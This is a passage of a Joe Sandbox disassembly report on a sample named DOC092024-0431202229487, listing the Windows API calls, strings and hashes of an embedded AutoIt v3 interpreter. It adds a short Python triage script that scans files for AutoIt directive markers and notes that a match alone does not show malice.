                                                        • Opcode Fuzzy Hash: fb067e24cf63860fff709958e17d70bc810a8fbe819735df831ef0bc97557974
                                                        • Instruction Fuzzy Hash: 33028E71A00205FFDB14DFA8DD89EAE7BB9EB49310F048159F906AB2A1D7389D41CF64
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 0077D0EB
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0077D11C
                                                        • GetSysColor.USER32(0000000F), ref: 0077D128
                                                        • SetBkColor.GDI32(?,000000FF), ref: 0077D142
                                                        • SelectObject.GDI32(?,00000000), ref: 0077D151
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0077D17C
                                                        • GetSysColor.USER32(00000010), ref: 0077D184
                                                        • CreateSolidBrush.GDI32(00000000), ref: 0077D18B
                                                        • FrameRect.USER32(?,?,00000000), ref: 0077D19A
                                                        • DeleteObject.GDI32(00000000), ref: 0077D1A1
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0077D1EC
                                                        • FillRect.USER32(?,?,00000000), ref: 0077D21E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0077D249
                                                          • Part of subcall function 0077D385: GetSysColor.USER32(00000012), ref: 0077D3BE
                                                          • Part of subcall function 0077D385: SetTextColor.GDI32(?,?), ref: 0077D3C2
                                                          • Part of subcall function 0077D385: GetSysColorBrush.USER32(0000000F), ref: 0077D3D8
                                                          • Part of subcall function 0077D385: GetSysColor.USER32(0000000F), ref: 0077D3E3
                                                          • Part of subcall function 0077D385: GetSysColor.USER32(00000011), ref: 0077D400
                                                          • Part of subcall function 0077D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0077D40E
                                                          • Part of subcall function 0077D385: SelectObject.GDI32(?,00000000), ref: 0077D41F
                                                          • Part of subcall function 0077D385: SetBkColor.GDI32(?,00000000), ref: 0077D428
                                                          • Part of subcall function 0077D385: SelectObject.GDI32(?,?), ref: 0077D435
                                                          • Part of subcall function 0077D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0077D454
                                                          • Part of subcall function 0077D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0077D46B
                                                          • Part of subcall function 0077D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0077D480
                                                          • Part of subcall function 0077D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0077D4A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: c40ee3708e0155d35517c449aaabdad12f9f8e0932ad5348ba6bec3f1de6cc50
                                                        • Instruction ID: 0cdab2ee3025fc6aa37c7e0ec78ce9f137303dfbedde383cceeffea52e65cc1b
                                                        • Opcode Fuzzy Hash: c40ee3708e0155d35517c449aaabdad12f9f8e0932ad5348ba6bec3f1de6cc50
                                                        • Instruction Fuzzy Hash: A591B172008305AFCB209F64DC08E6BBBB9FF85360F118A1AF566961E0D779DD42CB55
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 0076A42A
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0076A4E9
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0076A527
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0076A539
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0076A57F
                                                        • GetClientRect.USER32(00000000,?), ref: 0076A58B
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0076A5CF
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0076A5DE
                                                        • GetStockObject.GDI32(00000011), ref: 0076A5EE
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0076A5F2
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0076A602
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0076A60B
                                                        • DeleteDC.GDI32(00000000), ref: 0076A614
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0076A642
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0076A659
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0076A694
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0076A6A8
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0076A6B9
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0076A6E9
                                                        • GetStockObject.GDI32(00000011), ref: 0076A6F4
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0076A6FF
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0076A709
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 4c803bb49ff08e723490bb34a2eab3f45b0422bb78963a02217e1d4cefe2ce2e
                                                        • Instruction ID: 2d788bd6005e958233367a69d021a1ec27460b5e998b7626c443ff98fa65cdc1
                                                        • Opcode Fuzzy Hash: 4c803bb49ff08e723490bb34a2eab3f45b0422bb78963a02217e1d4cefe2ce2e
                                                        • Instruction Fuzzy Hash: 1EA19F71A40205BFEB14DBA8DC4AFAE7BB9EB04710F008115FA15A72E1DB78AD41CF64
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0075E45E
                                                        • GetDriveTypeW.KERNEL32(?,007ADC88,?,\\.\,007ADBF0), ref: 0075E54B
                                                        • SetErrorMode.KERNEL32(00000000,007ADC88,?,\\.\,007ADBF0), ref: 0075E6B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 7e25729e7efe3786e4b2707bf2b627cf0dc76641d057abe2c973eb8946e47b3c
                                                        • Instruction ID: d3ce311815b57c8210fff2f12bb45e28c663560413cc08edf1a0027d70c2fa5e
                                                        • Opcode Fuzzy Hash: 7e25729e7efe3786e4b2707bf2b627cf0dc76641d057abe2c973eb8946e47b3c
                                                        • Instruction Fuzzy Hash: 5851E470248301EBC318DF18C895DEDB7D1EB94786B10C91DF846AB1D1DAACDF49D652
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: 6864c29d66d40736058140b9dd4e7f0cf5aff5c2887b3004f1a65d6a0f54f9a6
                                                        • Instruction ID: 92838d5132e4ac5600b29339343f5bae81fcbd6b614ae3f0fdd08f9d97d523cd
                                                        • Opcode Fuzzy Hash: 6864c29d66d40736058140b9dd4e7f0cf5aff5c2887b3004f1a65d6a0f54f9a6
                                                        • Instruction Fuzzy Hash: 76610C71280251BBE732BAAC9C86FFA3358AF16740F140025F956A61C3EB9CDE91C661
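                                                        The String IDs in this block (#include, #include-once, #requireadmin, #notrayicon, #OnAutoItStartRegister, "Bad directive syntax error", "Cannot parse #include") are the directive parser of the AutoIt v3 interpreter, and the functions above create windows whose class name is "AutoIt v3": the image mapped at 0x710000 is the AutoIt runtime, so the sample is a compiled AutoIt script. The check below turns those report strings into a quick triage signal. It is an added example, not code from the report or from Joe Sandbox; the buffer it scans is constructed for the demonstration and is not taken from the sample.

```python
"""Triage check: does a buffer carry AutoIt v3 interpreter markers?

Added example, not part of the Joe Sandbox report. The marker strings are
copied from the String IDs in this section of the report; the sample data
below is constructed for the test and is not bytes from the analysed file.
"""
from __future__ import annotations

from dataclasses import dataclass

# AutoIt v3 directive / error strings and the interpreter's window class name,
# as listed in the report's String ID fields.
AUTOIT_MARKERS: tuple[str, ...] = (
    "AutoIt v3",
    "#OnAutoItStartRegister",
    "#include-once",
    "#notrayicon",
    "#pragma compile",
    "#requireadmin",
    "#comments-start",
    "Bad directive syntax error",
    "Cannot parse #include",
    "Unterminated group of comments",
)

# The interpreter compares directives with __wcsnicmp (the API ID above), so
# the strings live in the binary as UTF-16LE; ASCII is checked as well in case
# a dumper or unpacker has already narrowed them.
ENCODINGS = ("ascii", "utf-16-le")


@dataclass(frozen=True)
class MarkerHit:
    marker: str
    encoding: str
    offset: int


def find_autoit_markers(data: bytes) -> list[MarkerHit]:
    """Return every occurrence of a marker, in either encoding, sorted by offset."""
    hits: list[MarkerHit] = []
    for marker in AUTOIT_MARKERS:
        for enc in ENCODINGS:
            needle = marker.encode(enc)
            start = 0
            while (idx := data.find(needle, start)) != -1:
                hits.append(MarkerHit(marker, enc, idx))
                start = idx + 1
    return sorted(hits, key=lambda h: (h.offset, h.marker))


def looks_like_autoit(data: bytes, min_distinct: int = 3) -> bool:
    """Triage verdict: at least `min_distinct` different markers present.

    A lone "AutoIt v3" string is weak (a window class name can be copied into
    any binary); several directive-parser strings together are hard to explain
    other than by an embedded interpreter.
    """
    distinct = {h.marker for h in find_autoit_markers(data)}
    return len(distinct) >= min_distinct


def scan_file(path: str) -> list[MarkerHit]:
    """Scan a file on disk, e.g. the sample or one of the .sdmp dumps."""
    with open(path, "rb") as fh:
        return find_autoit_markers(fh.read())


# Constructed test buffer: a fake header, two UTF-16LE markers and one ASCII one.
CONSTRUCTED_SAMPLE = (
    b"MZ" + b"\x00" * 14
    + "#requireadmin".encode("utf-16-le")
    + b"\x00\x00"
    + b"AutoIt v3"
    + b"\x00"
    + "Bad directive syntax error".encode("utf-16-le")
)

if __name__ == "__main__":
    for hit in find_autoit_markers(CONSTRUCTED_SAMPLE):
        print(f"{hit.offset:#06x} {hit.encoding:<9} {hit.marker}")
    print("AutoIt markers present:", looks_like_autoit(CONSTRUCTED_SAMPLE))
```

                                                        Run scan_file against the original file or the .sdmp dumps listed under Memory Dump Source. A hit count above the threshold says "AutoIt runtime present", not "malicious": legitimate administration tools are compiled with AutoIt too, so the follow-up is to extract and read the embedded script rather than to block on this signal alone.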
                                                        APIs
                                                        • DestroyWindow.USER32 ref: 00714956
                                                        • DeleteObject.GDI32(00000000), ref: 00714998
                                                        • DeleteObject.GDI32(00000000), ref: 007149A3
                                                        • DestroyCursor.USER32(00000000), ref: 007149AE
                                                        • DestroyWindow.USER32(00000000), ref: 007149B9
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0078E179
                                                        • 6F570200.COMCTL32(?,000000FF,?), ref: 0078E1B2
                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0078E5E0
                                                          • Part of subcall function 007149CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00714954,00000000), ref: 00714A23
                                                        • SendMessageW.USER32 ref: 0078E627
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0078E63E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DestroyMessageSendWindow$DeleteObject$CursorF570200InvalidateMoveRect
                                                        • String ID: 0
                                                        • API String ID: 2008601239-4108050209
                                                        • Opcode ID: 8e72f83cd81b867c88f10a6c81e0998c83af7dbedc957feaa0d58f54bd4133d4
                                                        • Instruction ID: 5745613bea5bbe8ec58a548eace3107edea0b0b8901dc62eacbf8321e530b766
                                                        • Opcode Fuzzy Hash: 8e72f83cd81b867c88f10a6c81e0998c83af7dbedc957feaa0d58f54bd4133d4
                                                        • Instruction Fuzzy Hash: B912A130640642DFDB20DF18C888BAAB7F5BF45304F14456AF599CB292C739EC96CB91
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,007ADBF0), ref: 00776245
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 3964851224-45149045
                                                        • Opcode ID: 140dfbc06a9b986194dbf64b59281755df3b09ba39069c3134d4ff21266e46d9
                                                        • Instruction ID: 850e956cc83853528bbfa2d8838bab0de8b25bd3e5012a008a202ca9b2a2ef3a
                                                        • Opcode Fuzzy Hash: 140dfbc06a9b986194dbf64b59281755df3b09ba39069c3134d4ff21266e46d9
                                                        • Instruction Fuzzy Hash: 4FC17534204611DBCF04EF14C455AADB7E6AF95394F04887DF88A5B39ADB2CDD4ACB82
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0077D3BE
                                                        • SetTextColor.GDI32(?,?), ref: 0077D3C2
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0077D3D8
                                                        • GetSysColor.USER32(0000000F), ref: 0077D3E3
                                                        • CreateSolidBrush.GDI32(?), ref: 0077D3E8
                                                        • GetSysColor.USER32(00000011), ref: 0077D400
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0077D40E
                                                        • SelectObject.GDI32(?,00000000), ref: 0077D41F
                                                        • SetBkColor.GDI32(?,00000000), ref: 0077D428
                                                        • SelectObject.GDI32(?,?), ref: 0077D435
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0077D454
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0077D46B
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0077D480
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0077D4A8
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0077D4CF
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0077D4ED
                                                        • DrawFocusRect.USER32(?,?), ref: 0077D4F8
                                                        • GetSysColor.USER32(00000011), ref: 0077D506
                                                        • SetTextColor.GDI32(?,00000000), ref: 0077D50E
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0077D522
                                                        • SelectObject.GDI32(?,0077D0B5), ref: 0077D539
                                                        • DeleteObject.GDI32(?), ref: 0077D544
                                                        • SelectObject.GDI32(?,?), ref: 0077D54A
                                                        • DeleteObject.GDI32(?), ref: 0077D54F
                                                        • SetTextColor.GDI32(?,?), ref: 0077D555
                                                        • SetBkColor.GDI32(?,?), ref: 0077D55F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 8aa1bd458ed9e9669356b20ed625cd9593844638701ede0806067abb2ad46668
                                                        • Instruction ID: abb9f3e5b58aad7bb4be0d97caf173339d08e1e8102b9fcf518a6ea2430a1d88
                                                        • Opcode Fuzzy Hash: 8aa1bd458ed9e9669356b20ed625cd9593844638701ede0806067abb2ad46668
                                                        • Instruction Fuzzy Hash: 6C513D72900208EFDF209FA4DC48EAEBB79FF08360F218516F915AB2A1D7799D41CB54
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0077B5C0
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0077B5D1
                                                        • CharNextW.USER32(0000014E), ref: 0077B600
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0077B641
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0077B657
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0077B668
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0077B685
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0077B6D7
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0077B6ED
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 0077B71E
                                                        • _memset.LIBCMT ref: 0077B743
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0077B78C
                                                        • _memset.LIBCMT ref: 0077B7EB
                                                        • SendMessageW.USER32 ref: 0077B815
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0077B86D
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0077B91A
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0077B93C
                                                        • GetMenuItemInfoW.USER32(?), ref: 0077B986
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0077B9B3
                                                        • DrawMenuBar.USER32(?), ref: 0077B9C2
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0077B9EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0
                                                        • API String ID: 1073566785-4108050209
                                                        • Opcode ID: 45a23d60667d13fca7fdb0175df704f32b40a2db9734268bf81df89e307b8bde
                                                        • Instruction ID: ea51c8bda2da745efe2a7420436fde88da9de7b6a462641ea3902775705cd7c7
                                                        • Opcode Fuzzy Hash: 45a23d60667d13fca7fdb0175df704f32b40a2db9734268bf81df89e307b8bde
                                                        • Instruction Fuzzy Hash: A1E16E71900218EBDF209FA4CC88FEE7BB8EF05790F50C156F919AA191DB789A51DF60
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00777587
                                                        • GetDesktopWindow.USER32 ref: 0077759C
                                                        • GetWindowRect.USER32(00000000), ref: 007775A3
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00777605
                                                        • DestroyWindow.USER32(?), ref: 00777631
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0077765A
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00777678
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0077769E
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 007776B3
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007776C6
                                                        • IsWindowVisible.USER32(?), ref: 007776E6
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00777701
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00777715
                                                        • GetWindowRect.USER32(?,?), ref: 0077772D
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00777753
                                                        • GetMonitorInfoW.USER32 ref: 0077776D
                                                        • CopyRect.USER32(?,?), ref: 00777784
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 007777EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 513bacfce01cc79ebad0efaafe5b24ea8b1ab227b6501705147e3db35d617391
                                                        • Instruction ID: 7d9df38a99d0c35a3e711c87cdd957a8575f7f2012dd36e789e438cc790204ac
                                                        • Opcode Fuzzy Hash: 513bacfce01cc79ebad0efaafe5b24ea8b1ab227b6501705147e3db35d617391
                                                        • Instruction Fuzzy Hash: 3FB18E71608340AFDB18DF68C948B6ABBE4BF88350F00891DF59D9B291DB78EC05CB95
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0072A839
                                                        • GetSystemMetrics.USER32(00000007), ref: 0072A841
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0072A86C
                                                        • GetSystemMetrics.USER32(00000008), ref: 0072A874
                                                        • GetSystemMetrics.USER32(00000004), ref: 0072A899
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0072A8B6
                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0072A8C6
